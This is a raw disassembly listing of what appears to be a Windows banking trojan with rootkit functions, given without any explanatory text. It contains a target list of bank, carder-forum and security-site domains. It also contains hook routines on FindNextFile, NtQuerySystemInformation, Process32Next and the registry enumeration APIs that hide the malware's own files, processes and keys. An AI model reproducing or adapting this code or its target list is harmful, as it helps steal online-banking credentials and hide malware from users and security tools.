dd offset aWww_bbin_ru ; "www.bbin.ru"
dd offset aMasterX_com ; "master-x.com"
dd offset aEbookfinaltras ; "ebookfinaltrash.ru"
dd offset aWww_masterbank ; "www.masterbank.ru"
dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php"
dd offset aWww_bmo_com ; "www.bmo.com"
dd offset aWww_bankofmadu ; "www.bankofmadura.com"
dd offset aWww_cibc_com ; "www.cibc.com"
dd offset aWww_vtb_ru ; "www.vtb.ru"
dd offset aWww_cwbank_com ; "www.cwbank.com"
dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru"
dd offset aAlfabank_ru ; "alfabank.ru"
dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/"
dd offset aWww_mmbank_ru ; "www.mmbank.ru"
dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php"
dd offset aWww_uniastrum_ ; "www.uniastrum.ru"
dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aAsmworm_com ; "asmworm.com"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru"
dd offset aWww_worldbank_ ; "www.worldbank.org/index.php"
dd offset aWww_candidatev ; "www.candidateverifier.com/index.php"
dd offset aWww_sbrf_ru ; "www.sbrf.ru"
dd offset aPizdabolInc_ru ; "pizdabol-inc.ru"
dd offset aWww_bankofindi ; "www.bankofindia.com"
dd offset aWww_icbank_ru ; "www.icbank.ru"
dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."...
dd offset aWww_spyinstruc ; "www.spyinstructors.com"
dd offset aWww_kmb_ru ; "www.kmb.ru"
dd offset aWww_netmagiste ; "www.netmagister.com"
dd offset aWww_nomos_ru ; "www.nomos.ru"
dd offset aWww_absolutban ; "www.absolutbank.ru"
dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk"
dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk"
dd offset aWww_allahabadb ; "www.allahabadbank.com"
dd offset aMasterX_comFor ; "master-x.com/forum/"
dd offset aWww_rbc_com ; "www.rbc.com"
dd offset aWww_ovk_ru ; "www.ovk.ru"
dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php"
dd offset aProrat_net ; "prorat.net"
dd offset aYambo_biz ; "yambo.biz"
dd offset aKidosBank_ru ; "kidos-bank.ru"
dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"...
dd offset aBarclays_com ; "barclays.com"
dd offset aTotallyfreeban ; "totallyfreebanking.com"
dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php"
dd offset a53bank_com ; "53bank.com"
dd offset aWww_uralsib_ru ; "www.uralsib.ru"
dd offset aGrepwareFacili ; "grepware-facility.ru"
dd offset aWww_b2bTrust_c ; "www.b2b-trust.com"
dd offset aGutabank_ru ; "gutabank.ru"
dd offset aOpenbank_com ; "openbank.com"
dd offset aSeclab_ru ; "seclab.ru"
dd offset aTatNeftbank_ru ; "tat-neftbank.ru"
dd offset aSecuritylab_ru ; "securitylab.ru"
dd offset aRoyalbank_com ; "royalbank.com"
dd offset aFethard_biz ; "fethard.biz"
dd offset aWww_mdmbank_ru ; "www.mdmbank.ru"
dd offset aGronxplanets_r ; "gronxplanets.ru"
dd offset aChevychasebank ; "chevychasebank.com"
aSoftwareMicr_4 db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_405AAC+2EC�o
; sub_405AAC+356�o ...
aOfstkkq db 'ofstkkq',0 ; DATA XREF: sub_405AAC+2E7�o
; sub_405AAC+351�o
aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_405AAC+39A�o
; sub_405AAC+498�o
dword_41A1F4 dd 0 ; sub_4068A8:loc_4069C9�r ...
dword_41A1F8 dd 0 ; sub_4068A8+67�r ...
dword_41A1FC dd 38h ; sub_4015EC+79�w ...
off_41A200 dd offset loc_401659 ; DATA XREF: sub_4015EC+66�r
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401696
dd offset loc_401696
dd offset loc_401874
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401696
dd offset loc_401696
dd offset loc_401874
dd offset loc_401803
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401696
dd offset loc_401696
dd offset loc_401874
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401696
dd offset loc_401696
dd offset loc_401874
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401696
dd offset loc_401696
dd offset loc_4016CB
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401696
dd offset loc_401696
dd offset loc_4016CB
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401696
dd offset loc_401696
dd offset loc_4016CB
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401696
dd offset loc_401696
dd offset loc_4016CB
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_4016CB
dd offset loc_4016CB
dd offset loc_401733
dd offset loc_401759
dd offset loc_4017D1
dd offset loc_401797
dd offset loc_4016BA
dd offset loc_401785
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_401785
dd offset loc_401797
dd offset loc_401785
dd offset loc_401785
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
off_41A430 dd offset loc_401659 ; DATA XREF: sub_4015EC+24D�r
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_4017AE
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_4017C1
dd offset loc_4017C1
dd offset loc_4017C1
dd offset loc_4017C1
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_4016BA
dd offset loc_4017D1
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4017D1
dd offset loc_4017D1
dd offset loc_4017D1
dd offset loc_4017D1
dd offset loc_4017D1
dd offset loc_4017D1
dd offset loc_4017D1
dd offset loc_4017D1
dd offset loc_401785
dd offset loc_401785
dd offset loc_4017E7
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401785
dd offset loc_401797
dd offset loc_4017F3
dd offset loc_401874
dd offset loc_4017E7
dd offset loc_401874
dd offset loc_401874
dd offset loc_40166B
dd offset loc_401874
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_401874
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_401659
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4016BA
dd offset loc_4017D1
dd offset loc_4017D1
dd offset loc_4017AE
dd offset loc_4016BA
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_4016F1
dd offset loc_4017FC
dd offset loc_40170D
dd offset loc_40170D
dd offset loc_401874
dd offset loc_401874
dd offset loc_401686
dd offset loc_401686
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401659
dd offset loc_401659
off_41A600 dd offset loc_401840 ; DATA XREF: sub_4015EC+238�r
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_40186D
dd offset loc_40186D
dd offset loc_401874
dd offset loc_40186D
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401851
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401840
dd offset loc_40185E
dd offset loc_401840
dd offset loc_40186D
dd offset loc_40186D
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401840
dd offset loc_40185E
dd offset loc_401840
dd offset loc_40186D
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_40186D
dd offset loc_40186D
dd offset loc_40185E
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_401840
dd offset loc_40186D
dd offset loc_40186D
dd offset loc_40186D
dd offset loc_40186D
dd offset loc_40186D
dd offset loc_40186D
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
dd offset loc_401874
aFindnextfilea db 'FindNextFileA',0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_41A78F: ; CODE XREF: .data:0041A7D8�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 243A99Ch
test eax, eax
jz short loc_41A7DA
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_41A7A9: ; CODE XREF: .data:0041A7AF�j
cmp byte ptr [ebx], 0
jz short loc_41A7B1
inc ebx
jmp short loc_41A7A9
; ---------------------------------------------------------------------------
loc_41A7B1: ; CODE XREF: .data:0041A7AC�j
mov word ptr [ebx], 463Ah
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4DB3D2h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_41A7D7
popa
jmp short loc_41A7DA
; ---------------------------------------------------------------------------
loc_41A7D7: ; CODE XREF: .data:0041A7D2�j
popa
jmp short loc_41A78F
; ---------------------------------------------------------------------------
loc_41A7DA: ; CODE XREF: .data:0041A79C�j
; .data:0041A7D5�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h
db 65h, 57h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_41A810: ; CODE XREF: .data:0041A85F�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 243AA1Dh
test eax, eax
jz short loc_41A861
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_41A82A: ; CODE XREF: .data:0041A832�j
cmp word ptr [ebx], 0
jz short loc_41A834
inc ebx
inc ebx
jmp short loc_41A82A
; ---------------------------------------------------------------------------
loc_41A834: ; CODE XREF: .data:0041A82E�j
mov dword ptr [ebx], 46003Ah
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D4EB559h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_41A85E
popa
jmp short loc_41A861
; ---------------------------------------------------------------------------
loc_41A85E: ; CODE XREF: .data:0041A859�j
popa
jmp short loc_41A810
; ---------------------------------------------------------------------------
loc_41A861: ; CODE XREF: .data:0041A81D�j
; .data:0041A85C�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
dw 0FFFFh
dword_41A874 dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh
; DATA XREF: .data:0041ADC0�o
dd 616D726Fh, 6E6F6974h
db 0
; ---------------------------------------------------------------------------
loc_41A891: ; DATA XREF: .data:0041ADC8�o
push ebp
mov ebp, esp
sub esp, 24h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
sub esp, 10h
mov eax, [ebp+14h]
mov edi, [ebp+10h]
mov ebx, [ebp+0Ch]
mov [esp+0Ch], eax
mov [esp+8], edi
mov [esp+4], ebx
mov esi, [ebp+8]
mov [esp], esi
call near ptr 243AAC7h
mov [ebp-4], eax
cmp esi, 5
jz short loc_41A8E1
loc_41A8CD: ; CODE XREF: .data:0041A8E7�j
; .data:0041A93A�j
mov eax, [ebp-4]
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_41A8E1: ; CODE XREF: .data:0041A8CB�j
cmp edi, 1F40h
jle short loc_41A8CD
jmp short loc_41A8EF
; ---------------------------------------------------------------------------
loc_41A8EB: ; CODE XREF: .data:0041A93C�j
mov esi, ebx
loc_41A8ED: ; CODE XREF: .data:0041A934�j
add ebx, eax
loc_41A8EF: ; CODE XREF: .data:0041A8E9�j
pusha
mov eax, [ebx+44h]
push 50h
sub esp, 20h
xor ebx, ebx
loc_41A8FD: ; CODE XREF: .data:0041A910�j
bt eax, ebx
jb short loc_41A908
mov byte ptr [esp+ebx], 30h
jmp short loc_41A90C
; ---------------------------------------------------------------------------
loc_41A908: ; CODE XREF: .data:0041A900�j
mov byte ptr [esp+ebx], 31h
loc_41A90C: ; CODE XREF: .data:0041A906�j
inc ebx
cmp ebx, 20h
jnz short loc_41A8FD
push esp
call near ptr 0C4DB524h
add esp, 24h
test ax, ax
jnz short loc_41A923
popa
jmp short loc_41A936
; ---------------------------------------------------------------------------
loc_41A923: ; CODE XREF: .data:0041A91E�j
popa
mov eax, [ebx]
test eax, eax
jnz short loc_41A932
mov dword ptr [esi], 0
jmp short loc_41A936
; ---------------------------------------------------------------------------
loc_41A932: ; CODE XREF: .data:0041A928�j
add [esi], eax
jmp short loc_41A8ED
; ---------------------------------------------------------------------------
loc_41A936: ; CODE XREF: .data:0041A921�j
; .data:0041A930�j
mov eax, [ebx]
test eax, eax
jz short loc_41A8CD
jmp short loc_41A8EB
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0FFFFFFh
aProcess32next db 'Process32Next',0 ; DATA XREF: .data:off_41ADB0�o
word_41A952 dw 8360h ; DATA XREF: .data:off_41ADB8�o
dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh
dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h
dd 1013D07h, 5750101h, 20202E9h
db 2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_41A99A: ; CODE XREF: .data:0041A9E8�j
sub esp, 8
mov ebx, [ebp+0Ch]
mov edi, [ebp+8]
mov [esp+4], ebx
mov [esp], edi
call near ptr 243ABB1h
test eax, eax
jz short loc_41A9EA
pusha
mov eax, [ebx+8]
push 50h
sub esp, 20h
xor ebx, ebx
loc_41A9C1: ; CODE XREF: .data:0041A9D4�j
bt eax, ebx
jb short loc_41A9CC
mov byte ptr [esp+ebx], 30h
jmp short loc_41A9D0
; ---------------------------------------------------------------------------
loc_41A9CC: ; CODE XREF: .data:0041A9C4�j
mov byte ptr [esp+ebx], 31h
loc_41A9D0: ; CODE XREF: .data:0041A9CA�j
inc ebx
cmp ebx, 20h
jnz short loc_41A9C1
push esp
call near ptr 0C4DB5E8h
add esp, 24h
test ax, ax
jnz short loc_41A9E7
popa
jmp short loc_41A9EA
; ---------------------------------------------------------------------------
loc_41A9E7: ; CODE XREF: .data:0041A9E2�j
popa
jmp short loc_41A99A
; ---------------------------------------------------------------------------
loc_41A9EA: ; CODE XREF: .data:0041A9B1�j
; .data:0041A9E5�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41AA10: ; CODE XREF: .data:0041AA5D�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 243AC23h
test eax, eax
jnz short loc_41AA5F
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_41AA2B: ; CODE XREF: .data:0041AA31�j
cmp byte ptr [ebx], 0
jz short loc_41AA33
inc ebx
jmp short loc_41AA2B
; ---------------------------------------------------------------------------
loc_41AA33: ; CODE XREF: .data:0041AA2E�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4DB654h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_41AA59
popa
jmp short loc_41AA5F
; ---------------------------------------------------------------------------
loc_41AA59: ; CODE XREF: .data:0041AA54�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_41AA10
; ---------------------------------------------------------------------------
loc_41AA5F: ; CODE XREF: .data:0041AA23�j
; .data:0041AA57�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41AA78: ; CODE XREF: .data:0041AACB�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 243AC8Bh
test eax, eax
jnz short loc_41AACD
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_41AA93: ; CODE XREF: .data:0041AA9B�j
cmp word ptr [ebx], 0
jz short loc_41AA9D
inc ebx
inc ebx
jmp short loc_41AA93
; ---------------------------------------------------------------------------
loc_41AA9D: ; CODE XREF: .data:0041AA97�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D4EB7C2h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_41AAC7
popa
jmp short loc_41AACD
; ---------------------------------------------------------------------------
loc_41AAC7: ; CODE XREF: .data:0041AAC2�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_41AA78
; ---------------------------------------------------------------------------
loc_41AACD: ; CODE XREF: .data:0041AA8B�j
; .data:0041AAC5�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dword_41AAD4 dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h db 0
; ---------------------------------------------------------------------------
loc_41AAE5: ; DATA XREF: .data:0041AE18�o
push ebp
mov ebp, esp
loc_41AAE8: ; CODE XREF: .data:0041AB63�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_41AAF6
push dword ptr [eax]
loc_41AAF6: ; CODE XREF: .data:0041AAF2�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 243AD15h
test eax, eax
jnz short loc_41AB65
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_41AB1D: ; CODE XREF: .data:0041AB25�j
cmp word ptr [ebx], 0
jz short loc_41AB27
inc ebx
inc ebx
jmp short loc_41AB1D
; ---------------------------------------------------------------------------
loc_41AB27: ; CODE XREF: .data:0041AB21�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D4EB84Ch
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_41AB51
popa
jmp short loc_41AB65
; ---------------------------------------------------------------------------
loc_41AB51: ; CODE XREF: .data:0041AB4C�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_41AB5E
pop dword ptr [eax]
loc_41AB5E: ; CODE XREF: .data:0041AB5A�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_41AAE8
; ---------------------------------------------------------------------------
loc_41AB65: ; CODE XREF: .data:0041AB15�j
; .data:0041AB4F�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_41AB71
add esp, 4
loc_41AB71: ; CODE XREF: .data:0041AB6C�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41AB8C: ; CODE XREF: .data:0041AC01�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_41AB9A
push dword ptr [eax]
loc_41AB9A: ; CODE XREF: .data:0041AB96�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 243ADB9h
test eax, eax
jnz short loc_41AC03
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_41ABC1: ; CODE XREF: .data:0041ABC7�j
cmp byte ptr [ebx], 0
jz short loc_41ABC9
inc ebx
jmp short loc_41ABC1
; ---------------------------------------------------------------------------
loc_41ABC9: ; CODE XREF: .data:0041ABC4�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4DB7EAh
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_41ABEF
popa
jmp short loc_41AC03
; ---------------------------------------------------------------------------
loc_41ABEF: ; CODE XREF: .data:0041ABEA�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_41ABFC
pop dword ptr [eax]
loc_41ABFC: ; CODE XREF: .data:0041ABF8�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_41AB8C
; ---------------------------------------------------------------------------
loc_41AC03: ; CODE XREF: .data:0041ABB9�j
; .data:0041ABED�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_41AC0F
add esp, 4
loc_41AC0F: ; CODE XREF: .data:0041AC0A�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dword_41AC14 dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h db 65h, 57h, 0
; ---------------------------------------------------------------------------
loc_41AC27: ; DATA XREF: .data:0041AE38�o
push ebp
mov ebp, esp
loc_41AC2A: ; CODE XREF: .data:0041ACA5�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_41AC38
push dword ptr [eax]
loc_41AC38: ; CODE XREF: .data:0041AC34�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 243AE57h
test eax, eax
jnz short loc_41ACA7
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_41AC5F: ; CODE XREF: .data:0041AC67�j
cmp word ptr [ebx], 0
jz short loc_41AC69
inc ebx
inc ebx
jmp short loc_41AC5F
; ---------------------------------------------------------------------------
loc_41AC69: ; CODE XREF: .data:0041AC63�j
mov dword ptr [ebx], 560023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D4EB98Eh
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_41AC93
popa
jmp short loc_41ACA7
; ---------------------------------------------------------------------------
loc_41AC93: ; CODE XREF: .data:0041AC8E�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_41ACA0
pop dword ptr [eax]
loc_41ACA0: ; CODE XREF: .data:0041AC9C�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_41AC2A
; ---------------------------------------------------------------------------
loc_41ACA7: ; CODE XREF: .data:0041AC57�j
; .data:0041AC91�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_41ACB3
add esp, 4
loc_41ACB3: ; CODE XREF: .data:0041ACAE�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h
db 65h, 41h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41ACCE: ; CODE XREF: .data:0041AD43�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_41ACDC
push dword ptr [eax]
loc_41ACDC: ; CODE XREF: .data:0041ACD8�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 243AEFBh
test eax, eax
jnz short loc_41AD45
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_41AD03: ; CODE XREF: .data:0041AD09�j
cmp byte ptr [ebx], 0
jz short loc_41AD0B
inc ebx
jmp short loc_41AD03
; ---------------------------------------------------------------------------
loc_41AD0B: ; CODE XREF: .data:0041AD06�j
mov word ptr [ebx], 5623h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4DB92Ch
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_41AD31
popa
jmp short loc_41AD45
; ---------------------------------------------------------------------------
loc_41AD31: ; CODE XREF: .data:0041AD2C�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_41AD3E
pop dword ptr [eax]
loc_41AD3E: ; CODE XREF: .data:0041AD3A�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_41ACCE
; ---------------------------------------------------------------------------
loc_41AD45: ; CODE XREF: .data:0041ACFB�j
; .data:0041AD2F�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_41AD51
add esp, 4
loc_41AD51: ; CODE XREF: .data:0041AD4C�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
db 2 dup(0FFh), 0
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_401EAF+2C2�o
; .data:off_41ADB4�o
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_4019A1+1�o
; .data:0041ADC4�o ...
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .data:0041AE14�o
; .data:0041AE34�o
aIphlpapi_dll db 'iphlpapi.dll',0
aInetmib1_dll db 'inetmib1.dll',0
aWsock32_dll db 'wsock32.dll',0
aUser32_dll db 'user32.dll',0
off_41ADB0 dd offset aProcess32next ; DATA XREF: sub_401EAF+A9�r
; sub_401EAF+E3�r ...
